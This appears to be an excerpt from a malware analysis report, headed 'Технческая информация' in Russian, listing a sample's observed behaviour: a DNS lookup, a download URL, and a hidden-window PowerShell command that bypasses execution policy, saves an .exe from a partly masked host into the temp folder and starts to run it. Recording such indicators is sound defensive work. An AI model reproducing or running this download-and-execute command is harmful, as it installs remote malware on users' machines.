Техническая информация
- http://po##it.net/vcv/9807410.exe как %temp+%\newfile.exe
- '<SYSTEM32>\cmd.exe' /c powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://po##it.net/vcv/9807410.exe',$env:Temp+'\newfile.Exe');(New-Object -com Shell....
- http://po##it.net/vcv/9807410.exe
- DNS ASK po##it.net
- '<SYSTEM32>\cmd.exe' /c powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://po##it.net/vcv/9807410.exe',$env:Temp+'\newfile.Exe');(New-Object -com Shell....' (со скрытым окном)